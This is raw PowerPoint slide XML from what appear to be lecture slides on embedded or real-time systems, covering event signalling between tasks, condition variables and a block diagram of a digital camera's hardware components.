            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signaling from one task to another one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A task can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>wait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for an event, and another task can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>signal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sometimes support for waiting for OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> AND of multiple event objects (event flags)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86673475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Variable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A combination of an event and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both tasks want to access a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One task wants to wait for the other task to change the resource it, and then access it again</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://computing.llnl.gov/tutorials/pthreads/#ConditionVariables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="487185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609600"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Example – Digital Camera</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7171" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1752600"/>
            <a:ext cx="7923702" cy="4648200"/>
            <a:chOff x="1197" y="1849"/>
            <a:chExt cx="7215" cy="4052"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7172" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8412" y="3564"/>
              <a:ext cx="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sz="1600">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7173" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1835" y="1849"/>
              <a:ext cx="2170"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7174" name="Group 6"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1197" y="1862"/>
              <a:ext cx="6992" cy="4039"/>
              <a:chOff x="1248" y="2179"/>
              <a:chExt cx="6992" cy="4039"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7175" name="Rectangle 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2099" y="2275"/>
                <a:ext cx="6126" cy="386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 name="Rectangle 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1949" y="2179"/>
                <a:ext cx="6176" cy="3893"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="2800"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7177" name="Rectangle 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4209" y="3787"/>
                <a:ext cx="1576" cy="403"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC99"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Microprocessor</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7178" name="Rectangle 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3058" y="2733"/>
                <a:ext cx="1809"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en-US" sz="1600" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>CCD preprocessor</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7179" name="Rectangle 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5206" y="2733"/>
                <a:ext cx="172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Pixel coprocessor</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7180" name="Rectangle 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2131" y="2899"/>
                <a:ext cx="576"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A2D</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7181" name="Rectangle 13"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7334" y="2733"/>
                <a:ext cx="563" cy="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D2A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7182" name="Rectangle 14"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2040" y="3787"/>
                <a:ext cx="142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JPEG codec</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7183" name="Rectangle 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2060" y="4436"/>
                <a:ext cx="1831" cy="4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DMA controller</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7184" name="Rectangle 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2060" y="5490"/>
                <a:ext cx="181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Memory controller</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7185" name="Rectangle 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="5490"/>
                <a:ext cx="1702"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ISA bus interface</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7186" name="Rectangle 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5834" y="5490"/>
                <a:ext cx="89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UART</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7187" name="Rectangle 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6900" y="5490"/>
                <a:ext cx="997"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LCD ctrl</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7188" name="Rectangle 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6650" y="4436"/>
                <a:ext cx="1247" cy="4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en-US" sz="1600" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Display ctrl</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7189" name="Rectangle 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6183" y="3787"/>
                <a:ext cx="171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Multiplier/Accum</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7190" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2810" y="3470"/>
                <a:ext cx="4810" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4810"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 4810 w 4810"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 w 4810"/>
                  <a:gd name="T7" fmla="*/ 0 h 1"/>
                  <a:gd name="T8" fmla="*/ 4810 w 4810"/>
                  <a:gd name="T9" fmla="*/ 1 h 1"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T4">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T6" t="T7" r="T8" b="T9"/>
                <a:pathLst>
                  <a:path w="4810" h="1">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4810" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7191" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2809" y="5160"/>
                <a:ext cx="4411" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4411"/>
                  <a:gd name="T1" fmla="*/ 4 h 4"/>
                  <a:gd name="T2" fmla="*/ 4411 w 4411"/>
                  <a:gd name="T3" fmla="*/ 0 h 4"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 w 4411"/>
                  <a:gd name="T7" fmla="*/ 0 h 4"/>
                  <a:gd name="T8" fmla="*/ 4411 w 4411"/>
                  <a:gd name="T9" fmla="*/ 4 h 4"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T4">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T6" t="T7" r="T8" b="T9"/>
                <a:pathLst>
                  <a:path w="4411" h="4">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4411" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="7192" name="Group 24"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4838" y="5895"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="9915" y="11780"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7258" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9994"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9" name="Freeform 26"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9918"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60" name="Freeform 27"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9915"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3" name="Group 28"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="6212" y="5895"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="11499" y="11780"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7255" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11578"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6" name="Freeform 30"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11502"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7" name="Freeform 31"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11499"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4" name="Group 32"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2999" y="5895"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="7666" y="11780"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7252" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7745"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3" name="Freeform 34"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7669"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4" name="Freeform 35"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7666"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5" name="Group 36"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2730" y="5164"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="7417" y="11049"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7249" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7496"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0" name="Freeform 38"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7419" y="11049"/>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1" name="Freeform 39"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7417" y="11225"/>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6" name="Group 40"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7147" y="4841"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="12414" y="10726"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7246" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12493" y="10871"/>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7" name="Freeform 42"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12416" y="10726"/>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8" name="Freeform 43"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12414" y="10900"/>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7" name="Group 44"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7344" y="4841"/>
                <a:ext cx="156" cy="649"/>
                <a:chOff x="12831" y="10726"/>
                <a:chExt cx="156" cy="649"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7244" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12910" y="10726"/>
                  <a:ext cx="1" cy="5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5" name="Freeform 46"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12831"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8" name="Group 47"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4848" y="5164"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="9915" y="11049"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7241" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9994"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2" name="Freeform 49"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9918"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3" name="Freeform 50"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9915"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9" name="Group 51"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="6222" y="5164"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="11499" y="11049"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7238" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11578"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9" name="Freeform 53"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11502"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0" name="Freeform 54"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11499"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0" name="Group 55"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2730" y="3464"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="7417" y="9349"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7235" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7496"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6" name="Freeform 57"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7419" y="9349"/>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7" name="Freeform 58"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7417" y="9522"/>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1" name="Group 59"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3870" y="3138"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="8667" y="9023"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="7232" name="Line 60"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8746" y="9168"/>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3" name="Freeform 61"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
